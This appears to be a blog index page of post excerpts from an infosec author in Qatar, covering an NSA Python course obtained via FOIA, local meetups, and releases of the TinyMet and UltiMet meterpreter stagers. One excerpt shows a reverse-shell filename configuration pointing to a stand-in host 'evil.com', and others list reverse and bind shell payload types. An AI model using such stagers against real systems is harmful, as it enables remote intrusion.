Someone (Chris Swenson) was awesome enough to submit a FOIA request for NSA’s Python training course, and got their COMP 3321 course. He scanned them into a 118 MB PDF. I optimized the material into a 18MB file. https://deeb.io/wrdprs/wp-content/uploads/2020/02/comp3321_red.pdf
TinyMet is a tiny “4.5 kilobytes” flexible meterpreter stager, which supports multiple meterpreter transports, setting LPORT and LHOST during runtime. What’s new in v0.2: Now tinymet can parse the Transport, LPORT and LHOST from its own filename through separating them by underscore Example: “0_evil.com_4444.exe” will use reverse_tcp, LHOST=evil.com, LPORT=4444 This makes tinymet more (double-click/payload-like/argument-less) friendly. … [Read more…]
During our third 0xcoffee gathering, we discussed the New Anti-Cybercrime law of Qatar, and why should we, as infosec folks, care. The law is also available in the official MoJ site “Almeezan”: http://www.almeezan.qa/LawPage.aspx?id=6366&language=ar Please find all the materials attached, 0xC0FFEE – What is it: An informal get together, to have coffee & talk hackery. “The coffee sessions will … [Read more…]
We had a short presentation on the second 0xC0FF33 gathering about metasploit, meterpreter, tinymet and ultimet. Download the slides from here: TinyMet&UltiMet 0xC0FF33 Is an informal get together for the infosec community in Qatar, to have coffee & talk hackery, so, if you are an infosec guy who lives in Qatar, sign up here to join the … [Read more…]
UltiMet has not been working at all for a while because of updates in the framework itself … I managed to make it work again. Get the updated version from https://github.com/SherifEldeeb/inmet more about UltiMet here: http://eldeeb.net/wrdprs/?page_id=156
please find info here
To detect something “abnormal” in your computer network, you need to first know how the “normal” looks like … sounds simple, right? do you have a list of the processes that “normally” runs on your computer? network connections? how about system drivers? no? where’s “explorer.exe” in your computer? c:\windows or c:\windows\system32? don’t know? didn’t think … [Read more…]
You will not realize the difficulty of logging keystrokes if the target language is not English, unless you try to do it. Details are here: http://eldeeb.net/wrdprs/?page_id=229
25 – 01 Revolution Edition What’s new in this version? msfpayload functionality: It can create exe files that connects upon execution using pre-configured settings “exactly as msfpayload generated exe”, however, generated exe files still accept command line arguments and settings could be reset or changed, all that supported from within that single exe … “meterpreter-on-steroids”. (thanks … [Read more…]
What’s new: – Anwar Mohamed “@anwarelmakrahy” Added support for metsvc_bind_tcp & bind_tcp… `git pull` if you’re interested in the source code, or just get the binaries from here. … Thanks, Anwar! – Now ultimet works as the following meterpreter payloads: reverse_tcp bind_tcp reverse_http reverse_https bint_metsvc <- when stage included reverse_metsvc <- when stage included – Code got just … [Read more…]